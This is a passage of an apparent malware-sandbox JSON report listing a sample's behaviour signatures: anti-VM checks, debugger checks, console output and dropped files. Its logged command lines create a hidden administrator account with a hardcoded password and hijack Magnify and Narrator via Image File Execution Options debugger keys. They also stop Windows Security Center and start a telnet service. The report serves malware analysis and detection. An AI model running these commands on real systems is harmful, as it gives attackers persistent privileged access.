"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704387.202999,
"tid": 2580,
"flags": {}
},
"pid": 528,
"type": "call",
"cid": 116
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.109501,
"tid": 2784,
"flags": {}
},
"pid": 2796,
"type": "call",
"cid": 13
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.140501,
"tid": 2784,
"flags": {}
},
"pid": 2796,
"type": "call",
"cid": 175
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.140501,
"tid": 2784,
"flags": {}
},
"pid": 2796,
"type": "call",
"cid": 195
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.140501,
"tid": 2784,
"flags": {}
},
"pid": 2796,
"type": "call",
"cid": 235
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.140501,
"tid": 2784,
"flags": {}
},
"pid": 2796,
"type": "call",
"cid": 237
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.843501,
"tid": 3196,
"flags": {}
},
"pid": 3192,
"type": "call",
"cid": 23
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704388.999374,
"tid": 3244,
"flags": {}
},
"pid": 3240,
"type": "call",
"cid": 23
}
],
"references": [],
"name": "antivm_queries_computername"
},
{
"markcount": 2,
"families": [],
"description": "Checks if process is being debugged by a debugger",
"severity": 1,
"marks": [
{
"call": {
"category": "system",
"status": 0,
"stacktrace": [],
"last_error": 0,
"nt_status": -1073741772,
"api": "IsDebuggerPresent",
"return_value": 0,
"arguments": {},
"time": 1574704386.640375,
"tid": 1224,
"flags": {}
},
"pid": 2804,
"type": "call",
"cid": 121
},
{
"call": {
"category": "system",
"status": 0,
"stacktrace": [],
"last_error": 0,
"nt_status": -1073741772,
"api": "IsDebuggerPresent",
"return_value": 0,
"arguments": {},
"time": 1574704388.124501,
"tid": 2784,
"flags": {}
},
"pid": 2796,
"type": "call",
"cid": 122
}
],
"references": [],
"name": "checks_debugger"
},
{
"markcount": 583,
"families": [],
"description": "Command line console output was observed",
"severity": 1,
"marks": [
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.140875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 193
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:",
"console_handle": "0x00000007"
},
"time": 1574704386.140875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 195
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.140875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 230
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "cd",
"console_handle": "0x00000007"
},
"time": 1574704386.140875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 232
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " \/D \"\\Users\\cuck\\AppData\\Local\\Temp\\\" ",
"console_handle": "0x00000007"
},
"time": 1574704386.140875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 234
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 265
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "SET",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 267
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " user=ontar ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 269
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 286
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "SET",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 288
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " pass=Preaba1! ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 290
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 316
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 318
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " AdmGroupSID=S-1-5-32-544 ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 320
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 336
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 338
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " AdmGroup= ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 340
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 356
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "For",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 358
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " \/F",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 360
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " \"UseBackQ Tokens=1* Delims==\"",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 362
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " %I In ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 364
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "(`WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value | Find \"=\"`) Do ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 366
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 368
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " AdmGroup=%J ",
"console_handle": "0x00000007"
},
"time": 1574704386.155875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 370
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 398
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 400
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " AdmGroup=Administrators\r ",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 402
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 425
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 427
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " AdmGroup=Administrators ",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 429
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 452
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "net",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 454
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " user ontar Preaba1! \/add \/active:\"yes\" \/expires:\"never\" \/passwordchg:\"NO\" ",
"console_handle": "0x00000007"
},
"time": 1574704386.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 456
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704387.280875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 504
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "net",
"console_handle": "0x00000007"
},
"time": 1574704387.280875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 506
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " localgroup Administrators ontar \/add ",
"console_handle": "0x00000007"
},
"time": 1574704387.280875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 508
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 560
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 562
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " RDPGroupSID=S-1-5-32-555 ",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 564
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 585
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 587
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " RDPGroup= ",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 589
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "C:\\Users\\cuck\\AppData\\Local\\Temp>",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 609
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "For",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 611
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " \/F",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 613
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " \"UseBackQ Tokens=1* Delims==\"",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 615
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": " %I In ",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 617
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "(`WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value | Find \"=\"`) Do ",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 619
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "WriteConsoleW",
"return_value": 1,
"arguments": {
"buffer": "set",
"console_handle": "0x00000007"
},
"time": 1574704387.749875,
"tid": 2500,
"flags": {}
},
"pid": 2588,
"type": "call",
"cid": 621
}
],
"references": [],
"name": "console_output"
},
{
"markcount": 1,
"families": [],
"description": "Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)",
"severity": 1,
"marks": [
{
"category": "registry",
"ioc": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "recon_fingerprint"
},
{
"markcount": 1,
"families": [],
"description": "Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available",
"severity": 1,
"marks": [
{
"call": {
"category": "system",
"status": 1,
"stacktrace": [],
"api": "GlobalMemoryStatusEx",
"return_value": 1,
"arguments": {},
"time": 1574704387.202999,
"tid": 2580,
"flags": {}
},
"pid": 528,
"type": "call",
"cid": 100
}
],
"references": [],
"name": "antivm_memory_available"
},
{
"markcount": 1,
"families": [],
"description": "One or more processes crashed",
"severity": 1,
"marks": [
{
"call": {
"category": "__notification__",
"status": 1,
"stacktrace": [],
"raw": [
"stacktrace"
],
"api": "__exception__",
"return_value": 0,
"arguments": {
"stacktrace": "r\nd\np\nw\ni\nn\ns\nt\n+\n0\nx\n2\nf\n6\nb\n2\n \n@\n \n0\nx\n4\n2\nf\n6\nb\n2\n\n\nr\nd\np\nw\ni\nn\ns\nt\n+\n0\nx\n2\nf\n5\n6\nd\n \n@\n \n0\nx\n4\n2\nf\n5\n6\nd\n\n\nr\nd\np\nw\ni\nn\ns\nt\n+\n0\nx\n2\nd\n9\n8\n3\n \n@\n \n0\nx\n4\n2\nd\n9\n8\n3\n\n\nr\nd\np\nw\ni\nn\ns\nt\n+\n0\nx\n3\nf\n5\n1\n7\n \n@\n \n0\nx\n4\n3\nf\n5\n1\n7\n\n\nr\nd\np\nw\ni\nn\ns\nt\n+\n0\nx\n3\nf\n8\n0\n4\n \n@\n \n0\nx\n4\n3\nf\n8\n0\n4\n\n\nr\nd\np\nw\ni\nn\ns\nt\n+\n0\nx\n4\n3\ne\nc\nb\n \n@\n \n0\nx\n4\n4\n3\ne\nc\nb\n\n\nB\na\ns\ne\nT\nh\nr\ne\na\nd\nI\nn\ni\nt\nT\nh\nu\nn\nk\n+\n0\nx\n1\n2\n \nV\ne\nr\ni\nf\ny\nC\no\nn\ns\no\nl\ne\nI\no\nH\na\nn\nd\nl\ne\n-\n0\nx\nb\n3\n \nk\ne\nr\nn\ne\nl\n3\n2\n+\n0\nx\n1\n3\n3\nc\na\n \n@\n \n0\nx\n7\n5\nb\nc\n3\n3\nc\na\n\n\nR\nt\nl\nI\nn\ni\nt\ni\na\nl\ni\nz\ne\nE\nx\nc\ne\np\nt\ni\no\nn\nC\nh\na\ni\nn\n+\n0\nx\n6\n3\n \nR\nt\nl\nA\nl\nl\no\nc\na\nt\ne\nA\nc\nt\ni\nv\na\nt\ni\no\nn\nC\no\nn\nt\ne\nx\nt\nS\nt\na\nc\nk\n-\n0\nx\na\n1\n \nn\nt\nd\nl\nl\n+\n0\nx\n3\n9\ne\nd\n2\n \n@\n \n0\nx\n7\n7\nb\nc\n9\ne\nd\n2\n\n\nR\nt\nl\nI\nn\ni\nt\ni\na\nl\ni\nz\ne\nE\nx\nc\ne\np\nt\ni\no\nn\nC\nh\na\ni\nn\n+\n0\nx\n3\n6\n \nR\nt\nl\nA\nl\nl\no\nc\na\nt\ne\nA\nc\nt\ni\nv\na\nt\ni\no\nn\nC\no\nn\nt\ne\nx\nt\nS\nt\na\nc\nk\n-\n0\nx\nc\ne\n \nn\nt\nd\nl\nl\n+\n0\nx\n3\n9\ne\na\n5\n \n@\n \n0\nx\n7\n7\nb\nc\n9\ne\na\n5",
"registers": {
"esp": 1637748,
"edi": 32,
"eax": 1637748,
"ebp": 1637828,
"edx": 0,
"ebx": 33004704,
"esi": 33151836,
"ecx": 7
},
"exception": {
"instruction_r": "c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b",
"symbol": "RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727",
"instruction": "leave",
"module": "KERNELBASE.dll",
"exception_code": "0xeedfade",
"offset": 46887,
"address": "0x75dbb727"
}
},
"time": 1574704406.296626,
"tid": 4256,
"flags": {}
},
"pid": 4252,
"type": "call",
"cid": 106
}
],
"references": [],
"name": "raises_exception"
},
{
"markcount": 1,
"families": [],
"description": "Creates a service",
"severity": 2,
"marks": [
{
"call": {
"category": "services",
"status": 1,
"stacktrace": [],
"api": "CreateServiceW",
"return_value": 1842536,
"arguments": {
"service_start_name": "",
"start_type": 3,
"service_handle": "0x001c1d68",
"display_name": "",
"error_control": 1,
"service_name": "tlntsvr",
"filepath": "C:\\Users\\cuck\\AppData\\Local\\Temp\\tlntsvr.exe",
"filepath_r": "tlntsvr.exe",
"service_manager_handle": "0x001c1e08",
"desired_access": 983551,
"service_type": 16,
"password": ""
},
"time": 1574704400.687999,
"tid": 3176,
"flags": {}
},
"pid": 3172,
"type": "call",
"cid": 66
}
],
"references": [],
"name": "creates_service"
},
{
"markcount": 8,
"families": [],
"description": "Creates a suspicious process",
"severity": 2,
"marks": [
{
"category": "cmdline",
"ioc": "C:\\Windows\\system32\\cmd.exe \/S \/D \/c\" echo Y\"",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value ",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value | Find \"=\"",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value ",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value | Find \"=\"",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "C:\\Windows\\system32\\cmd.exe \/S \/D \/c\" echo y\"",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "suspicious_process"
},
{
"markcount": 4,
"families": [],
"description": "Drops a binary and executes it",
"severity": 2,
"marks": [
{
"category": "file",
"ioc": "C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"type": "ioc",
"description": null
},
{
"category": "file",
"ioc": "C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"type": "ioc",
"description": null
},
{
"category": "file",
"ioc": "C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"type": "ioc",
"description": null
},
{
"category": "file",
"ioc": "C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "dropper"
},
{
"markcount": 2,
"families": [],
"description": "Drops an executable to the user AppData folder",
"severity": 2,
"marks": [
{
"category": "file",
"ioc": "C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"type": "ioc",
"description": null
},
{
"category": "file",
"ioc": "C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "exe_appdata"
},
{
"markcount": 2,
"families": [],
"description": "Executes one or more WMI queries",
"severity": 2,
"marks": [
{
"category": "wmi",
"ioc": "SELECT Name FROM Win32_Group WHERE SID = 'S-1-5-32-544'",
"type": "ioc",
"description": null
},
{
"category": "wmi",
"ioc": "SELECT Name FROM Win32_Group WHERE SID = 'S-1-5-32-555'",
"type": "ioc",
"description": null
}
],
"references": [],
"name": "has_wmi"
},
{
"markcount": 2,
"families": [],
"description": "The binary likely contains encrypted or compressed data indicative of a packer",
"severity": 2,
"marks": [
{
"entropy": 7.888797691412245,
"section": {
"size_of_data": "0x0000e000",
"virtual_address": "0x0002c000",
"entropy": 7.888797691412245,
"name": "UPX1",
"virtual_size": "0x0000e000"
},
"type": "generic",
"description": "A section with a high entropy has been found"
},
{
"entropy": 0.9333333333333333,
"type": "generic",
"description": "Overall entropy of this PE file is high"
}
],
"references": [
"http:\/\/www.forensickb.com\/2013\/03\/file-entropy-explained.html",
"http:\/\/virii.es\/U\/Using%20Entropy%20Analysis%20to%20Find%20Encrypted%20and%20Packed%20Malware.pdf"
],
"name": "packer_entropy"
},
{
"markcount": 3,
"families": [],
"description": "Checks for the Locally Unique Identifier on the system for a suspicious privilege",
"severity": 2,
"marks": [
{
"call": {
"category": "system",
"status": 1,
"stacktrace": [],
"api": "LookupPrivilegeValueW",
"return_value": 1,
"arguments": {
"system_name": "",
"privilege_name": "SeDebugPrivilege"
},
"time": 1574704388.609876,
"tid": 3132,
"flags": {}
},
"pid": 3128,
"type": "call",
"cid": 176
},
{
"call": {
"category": "system",
"status": 1,
"stacktrace": [],
"api": "LookupPrivilegeValueW",
"return_value": 1,
"arguments": {
"system_name": "",
"privilege_name": "SeTakeOwnershipPrivilege"
},
"time": 1574704388.843501,
"tid": 3196,
"flags": {}
},
"pid": 3192,
"type": "call",
"cid": 51
},
{
"call": {
"category": "system",
"status": 1,
"stacktrace": [],
"api": "LookupPrivilegeValueW",
"return_value": 1,
"arguments": {
"system_name": "",
"privilege_name": "SeTakeOwnershipPrivilege"
},
"time": 1574704388.999374,
"tid": 3244,
"flags": {}
},
"pid": 3240,
"type": "call",
"cid": 51
}
],
"references": [],
"name": "privilege_luid_check"
},
{
"markcount": 2,
"families": [],
"description": "Terminates another process",
"severity": 2,
"marks": [
{
"call": {
"category": "process",
"status": 0,
"stacktrace": [],
"last_error": 0,
"nt_status": 0,
"api": "NtTerminateProcess",
"return_value": 0,
"arguments": {
"status_code": "0x00000000",
"process_identifier": 0,
"process_handle": "0x000000fc"
},
"time": 1574704388.609876,
"tid": 3132,
"flags": {}
},
"pid": 3128,
"type": "call",
"cid": 181
},
{
"call": {
"category": "process",
"status": 1,
"stacktrace": [],
"api": "NtTerminateProcess",
"return_value": 0,
"arguments": {
"status_code": "0x00000000",
"process_identifier": 0,
"process_handle": "0x000000fc"
},
"time": 1574704388.609876,
"tid": 3132,
"flags": {}
},
"pid": 3128,
"type": "call",
"cid": 182
}
],
"references": [],
"name": "terminates_remote_process"
},
{
"markcount": 2,
"families": [],
"description": "The executable is compressed using UPX",
"severity": 2,
"marks": [
{
"section": "UPX0",
"type": "generic",
"description": "Section name indicates UPX"
},
{
"section": "UPX1",
"type": "generic",
"description": "Section name indicates UPX"
}
],
"references": [],
"name": "packer_upx"
},
{
"markcount": 55,
"families": [],
"description": "Uses Windows utilities for basic Windows functionality",
"severity": 2,
"marks": [
{
"category": "cmdline",
"ioc": "sc stop wscsvc",
"type": "ioc",
"description": null
},
{
"category": "cmdline",
"ioc": "net start tlntsvr",
"type": "ioc",
